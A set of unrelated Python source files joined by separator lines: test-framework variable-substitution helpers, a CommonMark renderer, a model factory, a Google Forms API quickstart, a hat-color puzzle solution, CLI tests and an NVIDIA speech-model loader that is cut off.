                    set_global_var.get('name'),
                    str) and set_global_var.get('name'):
                name = set_global_var.get('name')
                query = set_global_var.get('query')
                if query and isinstance(query, list):
                    # Resolve ${...} references inside the query itself first.
                    query = replace_global_var_for_list(
                        init_var_list=query, global_var_dic=global_vars)
                # print(query)
                value = dict_get(response_text, query)
                global_vars[name] = str(value) if value else value
                new_temp_suite_params[name] = str(value) if value else value
        temp_suite_params.update(new_temp_suite_params)
    # temp_suite_params -> applied to the global variables elsewhere
    return temp_suite_params
def replace_global_var_for_list(init_var_list,
                                global_var_dic,
                                global_var_regex='\${.*?}',
                                match2key_sub_string_start_index=2,
                                match2key_sub_string_end_index=-1):
    """Apply ${...} substitution to every string in *init_var_list*.

    Delegates each element to replace_global_var_for_str and returns a new
    list in the same order.

    :raises TypeError: if init_var_list is not a list.
    :raises ValueError: if init_var_list is empty.
    """
    if not isinstance(init_var_list, list):
        raise TypeError('init_var_list must be list!')
    if len(init_var_list) < 1:
        raise ValueError('init_var_list should not be empty!')
    replaced_var = []
    for init_var_str in init_var_list:
        replaced_str = replace_global_var_for_str(
            init_var_str=init_var_str, global_var_dic=global_var_dic)
        replaced_var.append(replaced_str)
    return replaced_var
def replace_global_var_for_str(init_var_str,
                               global_var_dic,
                               global_var_regex=r'\${.*?}',
                               match2key_sub_string_start_index=2,
                               match2key_sub_string_end_index=-1):
    """Substitute ``${name}`` placeholders in *init_var_str* from *global_var_dic*.

    Unknown names are left untouched. The start/end index parameters strip
    the ``${`` prefix and ``}`` suffix from each match to recover the key.

    FIX: the regex default is now a raw string — the plain '\\${.*?}' literal
    relied on an invalid escape sequence (SyntaxWarning in modern Python);
    the string value is unchanged.

    :raises TypeError: on wrongly-typed arguments.
    """
    if not isinstance(init_var_str, str):
        raise TypeError('init_var_str must be str!')
    if not isinstance(global_var_dic, dict):
        raise TypeError('global_var_dic must be dict!')
    if not isinstance(global_var_regex, str):
        raise TypeError('global_var_regex must be str!')
    if not isinstance(match2key_sub_string_start_index, int):
        raise TypeError('match2key_sub_string_start_index must be int!')
    if not isinstance(match2key_sub_string_end_index, int):
        raise TypeError('match2key_sub_string_end_index must be int!')
    regex_pattern = re.compile(global_var_regex)

    def global_var_repl(match_obj):
        start_index = match2key_sub_string_start_index
        end_index = match2key_sub_string_end_index
        match_value = global_var_dic.get(
            match_obj.group()[start_index:end_index])
        # Convert numeric values to str, otherwise re.sub fails;
        # note match_value may legitimately be 0!
        match_value = str(
            match_value) if match_value is not None else match_value
        # Falsy (missing) values leave the placeholder as-is.
        return match_value if match_value else match_obj.group()

    replaced_var = re.sub(pattern=regex_pattern,
                          string=init_var_str,
                          repl=global_var_repl)
    return replaced_var
def is_slice_expression(expression):
    """Return True when *expression* begins like a slice, e.g. '1:2', ':', '-3:'."""
    return bool(re.match(r"(-?\d+)?:(-?\d+)?", expression))
def can_convert_to_int(input):
    """Return True when ``int(input)`` succeeds, False otherwise."""
    try:
        int(input)
    except (TypeError, ValueError):
        # FIX: narrowed from BaseException — the original also swallowed
        # KeyboardInterrupt and SystemExit; int() only raises these two.
        return False
    return True
def is_specific_search_by_dict_value(expression):
    """Return True for locators shaped like '<key>=<value>.<field>'."""
    return re.match(r'(.)+=(.)+\.(.)+', expression) is not None
def dict_get(dic, locators, default=None):
    """Walk *dic* along *locators* and return the located value.

    Each locator may be a dict key, a list index, a slice expression
    ('1:3'), the literal 'random', or a '<key>=<value regex>.<field>'
    search over a list of dicts. Returns *default* on lookup failure.
    """
    # Non-dict input: a string with a single locator is sliced or
    # regex-searched; anything else is returned unchanged.
    if not isinstance(dic, dict):
        if isinstance(dic, str) and len(locators) == 1:
            if is_slice_expression(locators[0]):
                slice_indexes = locators[0].split(':')
                start_index = int(
                    slice_indexes[0]) if slice_indexes[0] else None
                end_index = int(
                    slice_indexes[-1]) if slice_indexes[-1] else None
                value = dic[start_index:end_index]
                return value
            else:
                # Not a slice expression: fall back to a regex search.
                match_obj = re.search(locators[0], dic)
                return match_obj.group() if match_obj else None
        return dic
    if dic == {} or len(locators) < 1:
        return str(dic)  # stringified for a later re.search by the caller
    value = None
    for locator in locators:
        # Locators are whitespace-insensitive.
        locator = locator.replace(' ', '').replace('\n', '').replace('\t', '')
        # First step (value not yet a container): plain key lookup.
        if not type(value) in [dict, list] and isinstance(
                locator, str) and not is_slice_expression(locator):
            try:
                value = dic[locator]
            except KeyError:
                return default
            continue
        # String value + slice locator: slice the string.
        if isinstance(value, str) and is_slice_expression(locator):
            try:
                slice_indexes = locator.split(':')
                start_index = int(
                    slice_indexes[0]) if slice_indexes[0] else None
                end_index = int(
                    slice_indexes[-1]) if slice_indexes[-1] else None
                value = value[start_index:end_index]
            except KeyError:
                return default
            continue
        # Dict value: recurse one level with the current locator.
        if isinstance(value, dict):
            try:
                value = dict_get(value, [locator])
            except KeyError:
                return default
            continue
        if isinstance(value, list) and len(value) > 0:
            # Numeric locator: index into the list.
            if can_convert_to_int(locator):
                try:
                    value = value[int(locator)]
                except IndexError:
                    return default
                continue
            elif is_specific_search_by_dict_value(locator) and all(
                    [isinstance(v, dict) for v in value]):
                # e.g.
                # locator: email=michael(.)+.first_name
                # means: from the dict whose key matches 'email' and whose
                # value matches 'michael(.)+', take the value under 'first_name'.
                first_equal_index = locator.index('=')
                last_dot_index = locator.rindex('.')
                matched_key_re = locator[:first_equal_index]  # key regex to satisfy
                # regex the matched key's value must satisfy
                matched_value_re = locator[first_equal_index +
                                           1:last_dot_index]
                # key of the value to extract from the matching dict
                needed_value_key = locator[last_dot_index + 1:]
                for dic in value:
                    for k, v in dic.items():
                        if re.match(matched_key_re, str(k)) and re.match(
                                matched_value_re, str(v)):
                            needed_value = dic.get(needed_value_key)
                            value = needed_value
                            break
                    else:
                        continue
                    break
            else:
                return default
            continue
        # NOTE(review): this branch is only reached when value is NOT a
        # non-empty list; inside a non-empty list, locator 'random' falls
        # into the ``else: return default`` above — confirm that is intended.
        elif locator == 'random':
            try:
                value = value[random.randint(0, len(value) - 1)]
            except IndexError:
                return default
            continue
    return value
def resolve_faker_var(
        init_faker_var,
        faker_var_regex=r'\$faker{([a-z]{2}_[A-Z]{2})?\.?(.*?)(\(.*?\))}'):
    """Expand ``$faker{[locale.]method(args)}`` markers using the Faker library.

    Group 1 is an optional locale (e.g. 'en_US'), group 2 the Faker method
    name, group 3 the parenthesized (keyword) arguments.
    """
    re_global_var = re.compile(faker_var_regex)

    def faker_var_repl(match_obj):
        locale_index = match_obj.group(1)
        method_name = match_obj.group(2)
        _args = match_obj.group(3)
        _faker = Faker(locale_index)
        # Only keyword-style argument strings are parsed; otherwise no kwargs.
        _kwargs = str_args_2_dict(_args) if '=' in _args else {}
        match_value = getattr(_faker, method_name)(**_kwargs)
        # Convert numeric values to str, otherwise re.sub fails;
        # note match_value may legitimately be 0!
        match_value = str(
            match_value) if match_value is not None else match_value
        return match_value if match_value else match_obj.group()

    resolved_var = re.sub(pattern=re_global_var,
                          string=init_faker_var,
                          repl=faker_var_repl)
    return resolved_var
def str_args_2_dict(args: str) -> dict:
    """Parse '(k=v, n=<int>3, x=<float>1.5)' argument strings into a dict.

    Values are strings unless tagged with <int>/<float> markers.
    """
    cleaned = args.replace(' ', '').replace('(', '').replace(')', '')
    parsed = {}
    for pair in cleaned.split(','):
        eq_index = pair.index('=')
        key = pair[:eq_index]
        raw_value = pair[eq_index + 1:]
        # Typed markers convert the remainder after the tag.
        if '<int>' in raw_value:
            raw_value = int(raw_value[raw_value.find('<int>') + 5:])
        elif '<float>' in raw_value:
            raw_value = float(raw_value[raw_value.find('<float>') + 7:])
        parsed[key] = raw_value
    return parsed
def resolve_func_var(init_func_var,
                     func_var_regex=r'\$func{([a-zA-Z0-9_]*)(\(.*?\))}'):
    """Expand ``$func{method(args)}`` markers by calling methods on Func.

    Group 1 is the Func method name, group 2 the parenthesized arguments.
    """
    re_global_var = re.compile(func_var_regex)

    def func_var_repl(match_obj):
        method_name = match_obj.group(1)
        _args = match_obj.group(2)
        _func = Func()
        # Only keyword-style argument strings are parsed; otherwise no kwargs.
        _kwargs = str_args_2_dict(_args) if '=' in _args else {}
        match_value = getattr(_func, method_name)(**_kwargs)
        # Convert numeric values to str, otherwise re.sub fails;
        # note match_value may legitimately be 0!
        match_value = str(
            match_value) if match_value is not None else match_value
        return match_value if match_value else match_obj.group()

    resolved_var = re.sub(pattern=re_global_var,
                          string=init_func_var,
                          repl=func_var_repl)
    return resolved_var
class Func:
    """Helper callables exposed to ``$func{...}`` template expressions."""

    def __init__(self):
        pass

    def get_milli_second_timestamp(self):
        # Millisecond-precision UNIX timestamp.
        return int(round(time.time() * 1000))

    def get_micro_second_timestamp(self):
        # Microsecond-precision UNIX timestamp.
        return int(round(time.time() * 1000000))

    def get_second_timestamp(self):
        # Second-precision UNIX timestamp.
        return int(time.time())

    def get_current_time(self, format_str="%Y-%m-%d %H:%M:%S"):
        # Current local time rendered with *format_str*.
        return datetime.datetime.now().strftime(format_str)
# NOTE(review): this re-definition duplicates replace_global_var_for_str
# declared earlier in this module and silently shadows it at import time;
# consider removing one of the two copies.
def replace_global_var_for_str(init_var_str,
                               global_var_dic,
                               global_var_regex='\${.*?}',
                               match2key_sub_string_start_index=2,
                               match2key_sub_string_end_index=-1):
    """Substitute ``${name}`` placeholders in *init_var_str* from *global_var_dic*."""
    if not isinstance(init_var_str, str):
        raise TypeError('init_var_str must be str!')
    if not isinstance(global_var_dic, dict):
        raise TypeError('global_var_dic must be dict!')
    if not isinstance(global_var_regex, str):
        raise TypeError('global_var_regex must be str!')
    if not isinstance(match2key_sub_string_start_index, int):
        raise TypeError('match2key_sub_string_start_index must be int!')
    if not isinstance(match2key_sub_string_end_index, int):
        raise TypeError('match2key_sub_string_end_index must be int!')
    regex_pattern = re.compile(global_var_regex)
    def global_var_repl(match_obj):
        start_index = match2key_sub_string_start_index
        end_index = match2key_sub_string_end_index
        match_value = global_var_dic.get(
            match_obj.group()[start_index:end_index])
        # Convert numeric values to str, otherwise re.sub fails;
        # note match_value may legitimately be 0!
        match_value = str(
            match_value) if match_value is not None else match_value
        return match_value if match_value else match_obj.group()
    replaced_var = re.sub(pattern=regex_pattern,
                          string=init_var_str,
                          repl=global_var_repl)
    return replaced_var
def resolve_int_var(init_int_str, int_var_regex='\'?<int>([0-9]+)</int>\'?'):
    """Replace (optionally quoted) '<int>N</int>' markers with the bare number N."""
    pattern = re.compile(int_var_regex)

    def _unwrap(match_obj):
        digits = match_obj.group(1)
        return digits if digits else match_obj.group()

    return re.sub(pattern=pattern, string=init_int_str, repl=_unwrap)
|
"""
Commonmark with header level extension
"""
from CommonMark.blocks import Parser
from CommonMark.render.html import HtmlRenderer
class SteakRenderer(HtmlRenderer):
    """
    Custom renderer
    """
    def __init__(self, *args, **kwargs):
        """
        Set options

        Pops the ``headerleveloffset`` keyword (default 0) before delegating
        the remaining arguments to HtmlRenderer.
        """
        self._headerleveloffset = kwargs.pop("headerleveloffset", 0)
        super(SteakRenderer, self).__init__(*args, **kwargs)
    def heading(self, node, entering):
        """
        Override header level

        Shifts the heading level by the configured offset, clamped at h6,
        then renders via the base class.
        """
        node.level = min(node.level + self._headerleveloffset, 6)
        super(SteakRenderer, self).heading(node, entering)
def render(source, headerleveloffset=0):
    """
    Render markdown with Steak Renderer

    :param source: markdown text to render.
    :param headerleveloffset: amount to shift heading levels (clamped at h6).
    :returns: the rendered HTML string.
    """
    parser = Parser()
    ast = parser.parse(source)
    renderer = SteakRenderer(headerleveloffset=headerleveloffset)
    return renderer.render(ast)
|
from typing import Dict
from classifier.classes.core.Model import Model
from classifier.classes.modules.images.cnn_img.ModelImagesCNN import ModelImagesCNN
from classifier.classes.modules.images.cnn_rnn_img.ModelImagesCNNRNN import ModelImagesCNNRNN
from classifier.classes.modules.images.pre_trained_cnn.ModelPreTrainedCNN import ModelPreTrainedCNN
from classifier.classes.modules.multimodal.vistempnet.ModelVisTempNet import ModelVisTempNet
from classifier.classes.modules.multimodal.vistextnet.ModelVisTextNet import ModelVisTextNet
from classifier.classes.modules.sequences.cnn_rnn_seq.ModelSequencesCNNRNN import ModelSequencesCNNRNN
from classifier.classes.modules.sequences.cnn_seq.ModelSequencesCNN import ModelSequencesCNN
from classifier.classes.modules.sequences.rnn.ModelRNN import ModelRNN
from classifier.classes.modules.text.transformer.ModelTransformer import ModelTransformer
class ModelFactory:
    """Registry mapping model type identifiers to their Model classes."""

    models_map = {
        "vistextnet": ModelVisTextNet,
        "vistempnet": ModelVisTempNet,
        "rnn": ModelRNN,
        "cnn_seq": ModelSequencesCNN,
        "cnn_rnn_seq": ModelSequencesCNNRNN,
        "cnn_img": ModelImagesCNN,
        "cnn_rnn_img": ModelImagesCNNRNN,
        "pre_trained_cnn": ModelPreTrainedCNN,
        "transformer": ModelTransformer,
    }

    def get(self, model_type: str, model_params: Dict) -> Model:
        """Instantiate the model registered under *model_type*.

        :param model_type: key into models_map.
        :param model_params: parameters forwarded to the model constructor.
        :raises ValueError: if *model_type* is not registered.
        """
        # FIX: membership is tested directly on the dict (no needless .keys()).
        if model_type not in self.models_map:
            raise ValueError("Model {} is not implemented! \n Implemented models are: {}"
                             .format(model_type, list(self.models_map.keys())))
        return self.models_map[model_type](model_params)
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START forms_quickstart]
from __future__ import print_function
from apiclient import discovery
from httplib2 import Http
from oauth2client import client, file, tools
SCOPES = "https://www.googleapis.com/auth/forms.body"
DISCOVERY_DOC = "https://forms.googleapis.com/$discovery/rest?version=v1"

# Load previously authorized credentials from token.json; only run the
# interactive OAuth flow when there are none or they are invalid.
store = file.Storage('token.json')
creds = store.get()  # bug fix: was `creds = None`, which ignored the stored token and re-ran the OAuth flow on every execution
if not creds or creds.invalid:
    flow = client.flow_from_clientsecrets('client_secrets.json', SCOPES)
    creds = tools.run_flow(flow, store)

form_service = discovery.build('forms', 'v1', http=creds.authorize(
    Http()), discoveryServiceUrl=DISCOVERY_DOC, static_discovery=False)

# Request body for creating a form
NEW_FORM = {
    "info": {
        "title": "Quickstart form",
    }
}

# Request body to add a multiple-choice question
NEW_QUESTION = {
    "requests": [{
        "createItem": {
            "item": {
                "title": "In what year did the United States land a mission on the moon?",
                "questionItem": {
                    "question": {
                        "required": True,
                        "choiceQuestion": {
                            "type": "RADIO",
                            "options": [
                                {"value": "1965"},
                                {"value": "1967"},
                                {"value": "1969"},
                                {"value": "1971"}
                            ],
                            "shuffle": True
                        }
                    }
                },
            },
            "location": {
                "index": 0
            }
        }
    }]
}

# Creates the initial form
result = form_service.forms().create(body=NEW_FORM).execute()
# Adds the question to the form
question_setting = form_service.forms().batchUpdate(formId=result["formId"], body=NEW_QUESTION).execute()
# Prints the result to show the question has been added
get_result = form_service.forms().get(formId=result["formId"]).execute()
print(get_result)
# [END forms_quickstart]
|
"""
[2016-03-02] Challenge #256 [Intermediate] Guess my hat color
https://www.reddit.com/r/dailyprogrammer/comments/48l3u9/20160302_challenge_256_intermediate_guess_my_hat/
#Description
You are the game master of the game "Guess my hat color".
The game goes as following:
- You put a group of `n` people in one row, each facing the same direction
- You assign a colored hat to each person of the group
- Now you let each person guess the color of their own hat, starting with the last person in the row.
There are only 2 colors of hats and each person can only see the color of hats in front of them.
The group wins from the gamemaster if they can win by making only 1 mistake.
The challenge today is to write the logic to make the guess.
The person guessing can only see the persons in front of them (and their hats) and can hear the guesses from the
persons behind them.
They can **NEVER** look behind them or look at their own hat.
#Formal Inputs & Outputs
##Input description
You get the list of hat colors starting with the person in the back and going to the front
###Input 1 - 10 hats
Black
White
Black
Black
White
White
Black
White
White
White
###Input 2 - 11 hats
Black
Black
White
White
Black
Black
White
Black
White
White
White
###Input 3 - 10 hats
Black
Black
Black
Black
Black
Black
Black
Black
Black
White
##Output description
You have to show the guesses of the persons and whether they passed the challenge (they should if your logic is
correct).
#Notes/Hints
Obviously if you return at random `Black` or `White` this won't work. The person units will have to work together to
get a result with maximum 1 mistake.
There is no fixed ratio, neither do the participants know what the ratio is.
#An example for the layout
You have 4 people with lined up like this:
Black -> White -> White -> Black
The one in the back can see:
White -> White -> Black
The second one sees:
White -> Black
And so on...
#Bonus
[Here you have a large set (10000 hats)](https://gist.github.com/fvandepitte/8ab2e2ab0e42e3d4c731).
Make sure your program can handle this.
#Finally
Have a good challenge idea?
Consider submitting it to /r/dailyprogrammer_ideas
**EDIT** Added notes
Thanks to /u/355over113 for pointing out a typo
"""
def parity_guesses(hats):
    """Return every person's guess using the parity strategy.

    The person in the back announces the parity of the Black hats ahead
    ("Black" = odd, "White" = even). Everyone else can then deduce their own
    hat exactly from that parity and the guesses heard so far, so at most one
    guess (the first) is wrong.

    :param hats: hat colors back-to-front, each "Black" or "White"
    :return: list of guesses in the same order
    """
    if not hats:
        return []
    guesses = []
    # Parity of Black hats the back person can see; this is also the parity
    # that the remaining (unguessed) hats must have at every later step.
    remaining = sum(h == "Black" for h in hats[1:]) % 2
    guesses.append("Black" if remaining else "White")
    for i in range(1, len(hats)):
        ahead = sum(h == "Black" for h in hats[i + 1:]) % 2
        # My hat is Black exactly when it flips the parity of what is ahead.
        mine = "Black" if ahead != remaining else "White"
        guesses.append(mine)
        if mine == "Black":
            remaining ^= 1
    return guesses


def main():
    """Demonstrate the strategy on the first sample input (10 hats)."""
    hats = ["Black", "White", "Black", "Black", "White",
            "White", "Black", "White", "White", "White"]
    guesses = parity_guesses(hats)
    mistakes = sum(g != h for g, h in zip(guesses, hats))
    for hat, guess in zip(hats, guesses):
        print("{} -> guessed {}".format(hat, guess))
    print("Passed" if mistakes <= 1 else "Failed", "with", mistakes, "mistake(s)")


if __name__ == "__main__":
    main()
|
import src.modules.cli as cli
import os
import nltk
# NOTE(review): downloading *all* NLTK corpora at import time is very heavy
# (multi-GB) and runs whenever this test module is imported — consider
# downloading only the corpora these tests need. TODO confirm which ones.
nltk.download("all",quiet=True)
# Directory containing this test module; used to resolve fixture paths below.
dirname = os.path.dirname(__file__)
def test_cli_pdf_similarity():
    """Comparing a paper with itself should run without error."""
    paper = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
    cli.pdf_similarity(paper, paper, False)
def test_snowballing():
    """Snowballing over the bundled seed set should run without error."""
    seed_dir = os.path.join(dirname, 'snowballing_test_seed_set/')
    cli.snowballing(seed_dir)
def test_extract_pdf_references():
    """Reference extraction should write its JSON result without error."""
    paper = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
    cli.extract_pdf_references(pdf=paper, save_to_file="test_result.json")
def test_extract_keyphrases():
    """Keyphrase extraction should run on the sample paper without error."""
    paper = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
    cli.extract_keyphrases_pdf(pdf=paper)
def test_extract_keywords():
    """Keyword extraction should run on the sample paper without error."""
    paper = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
    cli.extract_keywords_pdf(pdf=paper)
def test_paper_selection():
    """Paper selection should run on a single abstract and a keyword list."""
    cli.paper_selection([" Conspiracy theories explain complex world events with reference to secret plots hatched by powerful groups. Belief in such theories is largely determined by a general propensity towards conspirational thinking. Such a conspiracy mentality can be understood as a generalised political attitude, distinct from established generalised political attitudes such as right\u2013wing authoritarianism (RWA) and social dominance orientation (SDO) (Study 1a, N = 497) that is temporally relatively stable (Study 1b and 1c, total N = 196). Three further studies (combined N = 854) show that in contrast to RWA and SDO, conspiracy mentality is related to prejudice against high\u2013power groups that are perceived as less likeable and more threatening than low\u2013power groups, whereas SDO and RWA are associated with an opposite reaction to perceptions of power. Study 5 (N = 1852) investigates the relationship of conspiracy mentality with political behavioural intentions in a specific catastrophic scenario (i.e. the damage to the Fukushima nuclear reactor after the 2011 tsunami in Japan) revealing a hitherto neglected role of conspiracy mentality in motivating social action aimed at changing the status quo. Copyright \u00a9 2013 European Association of Personality Psychology. "],["conspiracy", "conspiracy mentality", "social media", "sausage"])
def test_snowballing_paper_selection():
    """Paper selection should run on a stored snowballing result."""
    result_path = os.path.join(dirname,
                               '../src/modules/snowballing_result.json')
    keywords = ["conspiracy", "conspiracy mentality", "social media", "sausage"]
    cli.snowballing_paper_selection(snowballing_result_path=result_path, keywords=keywords)
def test_summary():
    """Summarization should run on a single abstract without error."""
    cli.summarization(" Conspiracy theories explain complex world events with reference to secret plots hatched by powerful groups. Belief in such theories is largely determined by a general propensity towards conspirational thinking. Such a conspiracy mentality can be understood as a generalised political attitude, distinct from established generalised political attitudes such as right\u2013wing authoritarianism (RWA) and social dominance orientation (SDO) (Study 1a, N = 497) that is temporally relatively stable (Study 1b and 1c, total N = 196). Three further studies (combined N = 854) show that in contrast to RWA and SDO, conspiracy mentality is related to prejudice against high\u2013power groups that are perceived as less likeable and more threatening than low\u2013power groups, whereas SDO and RWA are associated with an opposite reaction to perceptions of power. Study 5 (N = 1852) investigates the relationship of conspiracy mentality with political behavioural intentions in a specific catastrophic scenario (i.e. the damage to the Fukushima nuclear reactor after the 2011 tsunami in Japan) revealing a hitherto neglected role of conspiracy mentality in motivating social action aimed at changing the status quo. Copyright \u00a9 2013 European Association of Personality Psychology.")
|
# *****************************************************************************
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# *****************************************************************************
import sys
from typing import Optional
from os.path import abspath, dirname
import torch
# enabling modules discovery from global entrypoint
sys.path.append(abspath(dirname(__file__)+'/'))
from fastpitch.model import FastPitch as _FastPitch
from fastpitch.model_jit import FastPitch as _FastPitchJIT
from tacotron2.model import Tacotron2
from waveglow.model import WaveGlow
from common.text.symbols import get_symbols, get_pad_idx
def parse_model_args(model_name, parser, add_help=False):
    """Extend *parser* with the CLI arguments of the selected model.

    The per-model arg-parser modules are imported lazily so that only the
    dependencies of the requested model are required.

    :param model_name: one of 'Tacotron2', 'WaveGlow', 'FastPitch'
    :param parser: argparse.ArgumentParser to extend
    :param add_help: forwarded to the per-model parser factory
    :raises NotImplementedError: for an unknown *model_name*
    """
    # Consistent if/elif chain (the original mixed a bare `if` into it).
    if model_name == 'Tacotron2':
        from tacotron2.arg_parser import parse_tacotron2_args
        return parse_tacotron2_args(parser, add_help)
    elif model_name == 'WaveGlow':
        from waveglow.arg_parser import parse_waveglow_args
        return parse_waveglow_args(parser, add_help)
    elif model_name == 'FastPitch':
        from fastpitch.arg_parser import parse_fastpitch_args
        return parse_fastpitch_args(parser, add_help)
    else:
        raise NotImplementedError(model_name)
def batchnorm_to_float(module):
    """Recursively cast every batch-norm submodule of *module* to FP32."""
    def _cast(m):
        if isinstance(m, torch.nn.modules.batchnorm._BatchNorm):
            m.float()
    # Module.apply visits *module* itself and every descendant, which matches
    # the original explicit recursion over children.
    module.apply(_cast)
    return module
def init_bn(module):
    """Re-initialize affine batch-norm weights uniformly in [0, 1), recursively."""
    is_bn = isinstance(module, torch.nn.modules.batchnorm._BatchNorm)
    if is_bn and module.affine:
        module.weight.data.uniform_()
    for child in module.children():
        init_bn(child)
def get_model(model_name, model_config, device,
              uniform_initialize_bn_weight=False, forward_is_infer=False,
              jitable=False):
    """Instantiate Tacotron2, WaveGlow or FastPitch and move it to *device*.

    When ``forward_is_infer`` is True, a thin subclass is returned whose
    ``forward`` delegates to ``infer`` so the model can be called (or traced)
    uniformly for inference. For FastPitch, ``jitable`` selects the
    TorchScript-friendly variant with a fully annotated forward signature.

    :param model_name: 'Tacotron2', 'WaveGlow' or 'FastPitch'
    :param model_config: kwargs for the model constructor (see get_model_config)
    :param device: torch device the model is moved to
    :param uniform_initialize_bn_weight: re-init batch-norm weights uniformly
    :raises NotImplementedError: for an unknown *model_name*
    """
    model = None
    if model_name == 'Tacotron2':
        if forward_is_infer:
            # Subclass only remaps forward -> infer; constructor is unchanged.
            class Tacotron2__forward_is_infer(Tacotron2):
                def forward(self, inputs, input_lengths):
                    return self.infer(inputs, input_lengths)
            model = Tacotron2__forward_is_infer(**model_config)
        else:
            model = Tacotron2(**model_config)
    elif model_name == 'WaveGlow':
        if forward_is_infer:
            class WaveGlow__forward_is_infer(WaveGlow):
                def forward(self, spect, sigma=1.0):
                    return self.infer(spect, sigma)
            model = WaveGlow__forward_is_infer(**model_config)
        else:
            model = WaveGlow(**model_config)
    elif model_name == 'FastPitch':
        if forward_is_infer:
            if jitable:
                # TorchScript variant: no pitch_transform callable (callables
                # are not scriptable) and fully type-annotated arguments.
                class FastPitch__forward_is_infer(_FastPitchJIT):
                    def forward(self, inputs, input_lengths, pace: float = 1.0,
                                dur_tgt: Optional[torch.Tensor] = None,
                                pitch_tgt: Optional[torch.Tensor] = None,
                                speaker: int = 0):
                        return self.infer(inputs, input_lengths, pace=pace,
                                          dur_tgt=dur_tgt, pitch_tgt=pitch_tgt,
                                          speaker=speaker)
            else:
                class FastPitch__forward_is_infer(_FastPitch):
                    def forward(self, inputs, input_lengths, pace: float = 1.0,
                                dur_tgt: Optional[torch.Tensor] = None,
                                pitch_tgt: Optional[torch.Tensor] = None,
                                pitch_transform=None,
                                speaker: Optional[int] = None):
                        return self.infer(inputs, input_lengths, pace=pace,
                                          dur_tgt=dur_tgt, pitch_tgt=pitch_tgt,
                                          pitch_transform=pitch_transform,
                                          speaker=speaker)
            model = FastPitch__forward_is_infer(**model_config)
        else:
            model = _FastPitch(**model_config)
    else:
        raise NotImplementedError(model_name)
    if uniform_initialize_bn_weight:
        init_bn(model)
    return model.to(device)
def get_model_config(model_name, args):
    """Build the constructor kwargs for *model_name* from parsed CLI *args*.

    Returns a dict suitable for ``get_model(model_name, model_config, ...)``.

    :raises NotImplementedError: for an unknown *model_name*
    """
    if model_name == 'Tacotron2':
        model_config = dict(
            # optimization
            mask_padding=args.mask_padding,
            # audio
            n_mel_channels=args.n_mel_channels,
            # symbols
            n_symbols=len(get_symbols(args.symbol_set)),
            symbols_embedding_dim=args.symbols_embedding_dim,
            # encoder
            encoder_kernel_size=args.encoder_kernel_size,
            encoder_n_convolutions=args.encoder_n_convolutions,
            encoder_embedding_dim=args.encoder_embedding_dim,
            # attention
            attention_rnn_dim=args.attention_rnn_dim,
            attention_dim=args.attention_dim,
            # attention location
            attention_location_n_filters=args.attention_location_n_filters,
            attention_location_kernel_size=args.attention_location_kernel_size,
            # decoder
            n_frames_per_step=args.n_frames_per_step,
            decoder_rnn_dim=args.decoder_rnn_dim,
            prenet_dim=args.prenet_dim,
            max_decoder_steps=args.max_decoder_steps,
            gate_threshold=args.gate_threshold,
            p_attention_dropout=args.p_attention_dropout,
            p_decoder_dropout=args.p_decoder_dropout,
            # postnet
            postnet_embedding_dim=args.postnet_embedding_dim,
            postnet_kernel_size=args.postnet_kernel_size,
            postnet_n_convolutions=args.postnet_n_convolutions,
            decoder_no_early_stopping=args.decoder_no_early_stopping,
        )
        return model_config
    elif model_name == 'WaveGlow':
        model_config = dict(
            n_mel_channels=args.n_mel_channels,
            n_flows=args.flows,
            n_group=args.groups,
            n_early_every=args.early_every,
            n_early_size=args.early_size,
            # WN_config parameterizes the WaveNet-like affine coupling layers.
            WN_config=dict(
                n_layers=args.wn_layers,
                kernel_size=args.wn_kernel_size,
                n_channels=args.wn_channels
            )
        )
        return model_config
    elif model_name == 'FastPitch':
        model_config = dict(
            # io
            n_mel_channels=args.n_mel_channels,
            max_seq_len=args.max_seq_len,
            # symbols
            n_symbols=len(get_symbols(args.symbol_set)),
            padding_idx=get_pad_idx(args.symbol_set),
            symbols_embedding_dim=args.symbols_embedding_dim,
            # input FFT
            in_fft_n_layers=args.in_fft_n_layers,
            in_fft_n_heads=args.in_fft_n_heads,
            in_fft_d_head=args.in_fft_d_head,
            in_fft_conv1d_kernel_size=args.in_fft_conv1d_kernel_size,
            in_fft_conv1d_filter_size=args.in_fft_conv1d_filter_size,
            in_fft_output_size=args.in_fft_output_size,
            p_in_fft_dropout=args.p_in_fft_dropout,
            p_in_fft_dropatt=args.p_in_fft_dropatt,
            p_in_fft_dropemb=args.p_in_fft_dropemb,
            # output FFT
            out_fft_n_layers=args.out_fft_n_layers,
